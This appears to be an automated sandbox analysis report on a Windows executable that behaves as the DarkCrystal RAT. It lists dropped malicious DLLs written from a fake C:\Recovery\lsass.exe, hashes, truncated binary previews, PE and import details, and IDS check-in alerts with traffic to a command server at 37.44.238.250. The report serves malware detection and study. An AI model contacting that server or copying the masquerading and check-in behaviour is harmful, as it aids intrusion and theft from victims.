                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 50%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):85504
                                      Entropy (8bit):5.8769270258874755
                                      Encrypted:false
                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):85504
                                      Entropy (8bit):5.8769270258874755
                                      Encrypted:false
                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):32256
                                      Entropy (8bit):5.631194486392901
                                      Encrypted:false
                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 25%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):23552
                                      Entropy (8bit):5.519109060441589
                                      Encrypted:false
                                      SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                      MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                      SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                      SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                      SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 8%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):69632
                                      Entropy (8bit):5.932541123129161
                                      Encrypted:false
                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 50%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):23552
                                      Entropy (8bit):5.519109060441589
                                      Encrypted:false
                                      SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                      MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                      SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                      SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                      SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 8%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):32256
                                      Entropy (8bit):5.631194486392901
                                      Encrypted:false
                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 25%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):69632
                                      Entropy (8bit):5.932541123129161
                                      Encrypted:false
                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 50%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                      Process:C:\Windows\System32\PING.EXE
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):182
                                      Entropy (8bit):4.440230761468008
                                      Encrypted:false
                                      SSDEEP:3:mKzGGHQ6TpvmWiA3XLTSoYALTSoYALTSoYALTSoYALTSov:Pzzw69vmWxHLTSJALTSJALTSJALTSJA7
                                      MD5:8F42ACEB168881E6F98E6BBAF34A8E24
                                      SHA1:749DD367E5C57C0216B2AC180720E3C448317ED0
                                      SHA-256:7C40BBE2CFACA39C1EDD31530308DB7C104180DEA4F85F499382AD656150C27A
                                      SHA-512:7B208502F3E7A96B481D01258BAA8737EF414DA1C67FDBE13D9B91619E4FA0716D01EC563C58ADB3D2168F5702FDC12212AB82B1B86303DC9CC45638CDD1DB49
                                      Malicious:false
                                      Preview:..Pinging 562258 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.2745479313845625
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:Qsi7IgkrWa.exe
                                      File size:2'470'804 bytes
                                      MD5:6296cf36bbbbe91b8ff186d18a08afa3
                                      SHA1:3c71d4099d817731504433785dd2166f81d8ef15
                                      SHA256:5e0bd8298a3193c217f563a32aae650eb29dbb513716c34a4b7698309edd1f70
                                      SHA512:773640b9edeeb969c92a6835f66959d6fa1c2fc4fb2d79091475653e9c05eeaf30f330f664800eaed53a7cab52cb473b6b7b2c707a17ffaa22673b1e41fd8a67
                                      SSDEEP:49152:tBOdJrx6sOXg8ghhfCSUkIkA7JkUZkuyiTK:nuPOXhmgSUku7So9TK
                                      TLSH:76B5BF0D75914F72C274D6358E56013D52B0E7256652EB0FF6BF1293AB87BE08A322F2
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                      Icon Hash:3464643c696c1c63
                                      Entrypoint:0x41f530
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                      Instruction
                                      call 00007F17047CCB6Bh
                                      jmp 00007F17047CC47Dh
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      push dword ptr [ebp+08h]
                                      mov esi, ecx
                                      call 00007F17047BF2C7h
                                      mov dword ptr [esi], 004356D0h
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 004356D8h
                                      mov dword ptr [ecx], 004356D0h
                                      ret
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      mov esi, ecx
                                      lea eax, dword ptr [esi+04h]
                                      mov dword ptr [esi], 004356B8h
                                      push eax
                                      call 00007F17047CF90Fh
                                      test byte ptr [ebp+08h], 00000001h
                                      pop ecx
                                      je 00007F17047CC60Ch
                                      push 0000000Ch
                                      push esi
                                      call 00007F17047CBBC9h
                                      pop ecx
                                      pop ecx
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 0Ch
                                      lea ecx, dword ptr [ebp-0Ch]
                                      call 00007F17047BF242h
                                      push 0043BEF0h
                                      lea eax, dword ptr [ebp-0Ch]
                                      push eax
                                      call 00007F17047CF3C9h
                                      int3
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 0Ch
                                      lea ecx, dword ptr [ebp-0Ch]
                                      call 00007F17047CC588h
                                      push 0043C0F4h
                                      lea eax, dword ptr [ebp-0Ch]
                                      push eax
                                      call 00007F17047CF3ACh
                                      int3
                                      jmp 00007F17047D0E47h
                                      int3
                                      int3
                                      int3
                                      int3
                                      push 00422900h
                                      push dword ptr fs:[00000000h]
                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x4698c.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xab0000x233c.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x640000x4698c0x46a003f4d23126f23b7eef4868a5cf2d90300False0.09705821349557522data2.835181165535476IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xab0000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      PNG0x645240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                      PNG0x6506c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                      RT_ICON0x666180x42028Device independent bitmap graphic, 256 x 512 x 32, image size 2621440.057009497884427614
                                      RT_DIALOG0xa86400x286dataEnglishUnited States0.5092879256965944
                                      RT_DIALOG0xa88c80x13adataEnglishUnited States0.60828025477707
                                      RT_DIALOG0xa8a040xecdataEnglishUnited States0.6991525423728814
                                      RT_DIALOG0xa8af00x12edataEnglishUnited States0.5927152317880795
                                      RT_DIALOG0xa8c200x338dataEnglishUnited States0.45145631067961167
                                      RT_DIALOG0xa8f580x252dataEnglishUnited States0.5757575757575758
                                      RT_STRING0xa91ac0x1e2dataEnglishUnited States0.3900414937759336
                                      RT_STRING0xa93900x1ccdataEnglishUnited States0.4282608695652174
                                      RT_STRING0xa955c0x1b8dataEnglishUnited States0.45681818181818185
                                      RT_STRING0xa97140x146dataEnglishUnited States0.5153374233128835
                                      RT_STRING0xa985c0x46cdataEnglishUnited States0.3454063604240283
                                      RT_STRING0xa9cc80x166dataEnglishUnited States0.49162011173184356
                                      RT_STRING0xa9e300x152dataEnglishUnited States0.5059171597633136
                                      RT_STRING0xa9f840x10adataEnglishUnited States0.49624060150375937
                                      RT_STRING0xaa0900xbcdataEnglishUnited States0.6329787234042553
                                      RT_STRING0xaa14c0xd6dataEnglishUnited States0.5747663551401869
                                      RT_GROUP_ICON0xaa2240x14data1.1
                                      RT_MANIFEST0xaa2380x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                                      DLLImport
                                      KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                      OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                      gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-12-06T01:42:17.898445+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973437.44.238.25080TCP
                                      2024-12-06T01:42:31.195384+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973737.44.238.25080TCP
                                      2024-12-06T01:42:39.992268+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973837.44.238.25080TCP
                                      2024-12-06T01:42:53.226683+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973937.44.238.25080TCP
                                      2024-12-06T01:43:06.601728+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44976237.44.238.25080TCP
                                      2024-12-06T01:43:15.086183+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44978137.44.238.25080TCP
                                      2024-12-06T01:43:23.586177+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44980137.44.238.25080TCP
                                      2024-12-06T01:43:32.804998+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44982337.44.238.25080TCP
                                      2024-12-06T01:43:41.383131+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44984437.44.238.25080TCP
                                      2024-12-06T01:43:54.133125+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44987237.44.238.25080TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 6, 2024 01:42:16.414024115 CET4973480192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:16.531716108 CET804973437.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:16.531791925 CET4973480192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:16.532170057 CET4973480192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:16.649475098 CET804973437.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:16.883887053 CET4973480192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:17.004509926 CET804973437.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:17.851090908 CET804973437.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:17.898444891 CET4973480192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:18.085515022 CET804973437.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:18.132839918 CET4973480192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:18.357305050 CET4973480192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:29.757940054 CET4973780192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:29.878500938 CET804973737.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:29.878680944 CET4973780192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:29.878978968 CET4973780192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:29.999294996 CET804973737.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:30.226990938 CET4973780192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:30.348244905 CET804973737.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:31.150566101 CET804973737.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:31.195384026 CET4973780192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:31.385164022 CET804973737.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:31.429758072 CET4973780192.168.2.437.44.238.250
